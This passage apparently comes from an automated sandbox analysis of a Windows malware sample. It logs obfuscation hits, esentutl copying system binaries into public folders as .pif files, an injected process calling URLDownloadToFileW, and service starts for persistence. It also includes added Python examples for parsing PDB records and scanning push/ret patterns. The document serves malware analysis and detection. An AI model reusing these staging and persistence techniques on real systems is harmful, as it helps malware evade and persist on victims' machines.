              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Section loaded: ??.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: jW3NEKvxH1.exe | Static file information: File size 1285120 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
              Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
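The ".pdb" strings above are CodeView debug records that survive in the dumped memory regions. What follows is an added example, not code from the report or from Joe Sandbox: it parses such records properly and, beside that, reproduces the terminator-blind string scan that produces the report's "cmd.pdbUGP" and "easinvoker.pdbGCTL" variants. The extra letters are the signature bytes of the POGO debug entry that the linker typically places right after the RSDS record, not part of the path. The dump buffer, the GUIDs and the age values below are constructed; only the two path names come from the report.

```python
"""Recover PDB paths from a memory dump the way the 'Binary string: ... .pdb'
entries are produced.  Added example, not Joe Sandbox code.

A CodeView record is laid out as: 'RSDS' | 16-byte GUID (little-endian mixed
encoding) | 4-byte age | NUL-terminated path.  SAMPLE_DUMP is constructed:
the GUIDs and ages are made up, the two path names are the ones the report
lists, and the bytes placed after each terminator are the POGO signatures
(0x50475500 -> "\\0UGP", 0x4C544347 -> "GCTL") that explain the suffixed
variants a terminator-blind scan reports."""
import re
import struct
import uuid

GUID_CMD = uuid.UUID("11111111-2222-3333-4444-555555555555")         # constructed
GUID_EASINVOKER = uuid.UUID("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee")  # constructed

SAMPLE_DUMP = (
    b"\x00" * 16
    + b"RSDS" + GUID_CMD.bytes_le + struct.pack("<I", 1) + b"cmd.pdb\x00"
    + struct.pack("<I", 0x50475500)            # POGO 'PGU' signature -> "\0UGP"
    + b"\x90" * 7
    + b"RSDS" + GUID_EASINVOKER.bytes_le + struct.pack("<I", 3) + b"easinvoker.pdb\x00"
    + struct.pack("<I", 0x4C544347)            # POGO 'LTCG' signature -> "GCTL"
    + b"RSDS" + b"\xff" * 60                   # garbage record without terminator
)


def find_rsds(buf: bytes):
    """Return (guid, age, pdb_path) for every well-formed RSDS record in buf."""
    found = []
    pos = buf.find(b"RSDS")
    while pos != -1:
        hdr_end = pos + 24                                  # 4 sig + 16 guid + 4 age
        nul = buf.find(b"\x00", hdr_end, hdr_end + 260)     # MAX_PATH bound on the name
        if hdr_end <= len(buf) and nul != -1:
            raw = buf[hdr_end:nul]
            if raw and all(0x20 <= b < 0x7F for b in raw):  # printable ASCII only
                guid = str(uuid.UUID(bytes_le=buf[pos + 4:pos + 20]))
                age = struct.unpack_from("<I", buf, pos + 20)[0]
                found.append((guid, age, raw.decode("ascii")))
        pos = buf.find(b"RSDS", pos + 4)
    return found


# printable run ending in .pdb, then up to two NULs and a few more printable
# bytes: the shape of a scan that does not stop at the path terminator
PDB_RUN = re.compile(rb"[\x20-\x7e]{1,64}\.pdb\x00{0,2}[\x20-\x7e]{0,4}")


def terminator_blind_scan(buf: bytes):
    """What a terminator-blind string scan sees: the PDB name plus whatever
    printable bytes follow it, as in the report's 'cmd.pdbUGP'."""
    return [m.group().replace(b"\x00", b"").decode("ascii")
            for m in PDB_RUN.finditer(buf)]


if __name__ == "__main__":
    for guid, age, path in find_rsds(SAMPLE_DUMP):
        print(f"{guid} age={age} {path}")
    print(terminator_blind_scan(SAMPLE_DUMP))
```

The parser stops at the terminator and bounds the name at MAX_PATH, so a truncated record (the third one in the sample) is skipped rather than turned into a bogus path.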

              Data Obfuscation

Source: Yara match | File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: alpha.pif.4.dr | Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC] (a link time in the future; alpha.pif is the esentutl-made copy of cmd.exe, and Microsoft's reproducible builds fill this field with a hash rather than a build time, so the value is a property of cmd.exe, not of the loader)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary
Source: alpha.pif.4.dr | Static PE information: section name: .didat (delay-load import data, standard in Microsoft-linked binaries such as cmd.exe)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D363B0 push 02D3640Bh; ret at 0_2_02D36403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D363AE push 02D3640Bh; ret at 0_2_02D36403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3C349 push 8B02D3C1h; ret at 0_2_02D3C34E
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D5C378 push 02D5C56Eh; ret at 0_2_02D5C566
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D36782 push 02D367C6h; ret at 0_2_02D367BE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D36784 push 02D367C6h; ret at 0_2_02D367BE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D5C570 push 02D5C56Eh; ret at 0_2_02D5C566
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3C56C push ecx; mov dword ptr [esp], edx at 0_2_02D3C571
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4AADF push 02D4AB18h; ret at 0_2_02D4AB10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D48AD8 push 02D48B10h; ret at 0_2_02D48B08
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4AAE0 push 02D4AB18h; ret at 0_2_02D4AB10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DA4A50 push eax; ret at 0_2_02DA4B20
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3CBEC push 02D3CD72h; ret at 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4886C push 02D488AEh; ret at 0_2_02D488A6
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3C9DF push 02D3CD72h; ret at 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3C98F push 02D3CD72h; ret at 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D46946 push 02D469F3h; ret at 0_2_02D469EB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D46948 push 02D469F3h; ret at 0_2_02D469EB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D42F60 push 02D42FD6h; ret at 0_2_02D42FCE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D5D2FC push 02D5D367h; ret at 0_2_02D5D35F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3332C push eax; ret at 0_2_02D33368
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D5D0AC push 02D5D125h; ret at 0_2_02D5D11D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4306C push 02D430B9h; ret at 0_2_02D430B1
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4306B push 02D430B9h; ret at 0_2_02D430B1
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D5D1F8 push 02D5D288h; ret at 0_2_02D5D280
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D5D144 push 02D5D1ECh; ret at 0_2_02D5D1E4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4F108 push ecx; mov dword ptr [esp], edx at 0_2_02D4F10D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02E0D43F push ecx; ret at 0_2_02E0D452
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DEB586 push ecx; ret at 0_2_02DEB599
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3D5A0 push 02D3D5CCh; ret at 0_2_02D3D5C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4790C push 02D47989h; ret at 0_2_02D47981
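Two of the static findings in this section can be reproduced with a few lines: the far-future TimeDateStamp reported for alpha.pif, and the list of "push <imm>; ret" functions, which are `68 <imm32> C3` byte pairs that transfer control to the pushed address instead of using a jmp. The following is an added example, not code from the report or from Joe Sandbox. The timestamp value 0xF8D87E17 is the report's; the code blob is constructed so that its first push/ret has its ret at 0x02D36403, matching the report's first entry (function 0_2_02D363B0), and its second push carries the immediate 8B02D3C1h from the 0_2_02D3C349 entry, whose target lies outside the image. The image range 0x02D30000 to 0x02E20000 is an assumption taken from the spread of the listed function addresses.

```python
"""Static checks behind the TimeDateStamp and 'push ...; ret' findings.
Added example, not Joe Sandbox code.  SAMPLE_CODE is constructed; the
timestamp 0xF8D87E17 and the two push immediates come from the report."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(ts: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp: unsigned 32-bit seconds since 1970."""
    return EPOCH + timedelta(seconds=ts & 0xFFFFFFFF)


def timestamp_is_suspicious(ts: int, now: datetime) -> bool:
    """A placeholder (0 / 0xFFFFFFFF) or a link time after `now` is not a real
    build date.  Caveat: current Microsoft system binaries store a
    reproducible-build hash here, so a copy of cmd.exe trips this as well."""
    ts &= 0xFFFFFFFF
    return ts in (0, 0xFFFFFFFF) or pe_timestamp(ts) > now


def find_push_ret(code: bytes, base: int, image_lo: int, image_hi: int):
    """Linear sweep for 68 <imm32> C3 (push imm32; ret) in `code` mapped at
    `base`.  Returns (push_addr, target, in_image).  A target outside the
    image is usually data or a misaligned decode, not a real control
    transfer; a linear sweep cannot tell the two apart by itself."""
    hits = []
    i = code.find(b"\x68")
    while i != -1:
        if i + 6 <= len(code) and code[i + 5] == 0xC3:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, target, image_lo <= target < image_hi))
        i = code.find(b"\x68", i + 1)
    return hits


IMAGE_LO, IMAGE_HI = 0x02D30000, 0x02E20000   # assumed from the listed addresses
SAMPLE_BASE = 0x02D363EE                      # chosen so the first ret lands at 0x02D36403
SAMPLE_CODE = (
    b"\x90" * 16                               # filler up to 0x02D363FE
    + b"\x68\x0b\x64\xd3\x02\xc3"              # push 02D3640Bh; ret   (target 8 bytes past the ret)
    + b"\x90" * 10
    + b"\x68\xc1\xd3\x02\x8b\xc3"              # push 8B02D3C1h; ret   (target outside the image)
    + b"\x68\x01\x00\x00\x00\x90"              # push 1 with no ret after it: ignored
    + b"\xcc" * 4
)

if __name__ == "__main__":
    print(pe_timestamp(0xF8D87E17).isoformat())
    for addr, target, ok in find_push_ret(SAMPLE_CODE, SAMPLE_BASE, IMAGE_LO, IMAGE_HI):
        print(f"{addr:08X}: push {target:08X}h; ret  {'in image' if ok else 'OUT OF IMAGE'}")
```

The in-image filter is the caveat worth keeping: the report's `push 8B02D3C1h` is almost certainly a disassembler landing on an `8B` (mov) opcode byte, and a triage script that counts every 68/C3 pair as obfuscation will overstate the finding.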

              Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Dlaybpxl.PIF
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02926128 ShellExecuteW,URLDownloadToFileW
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Dlaybpxl.PIF
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif

              Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
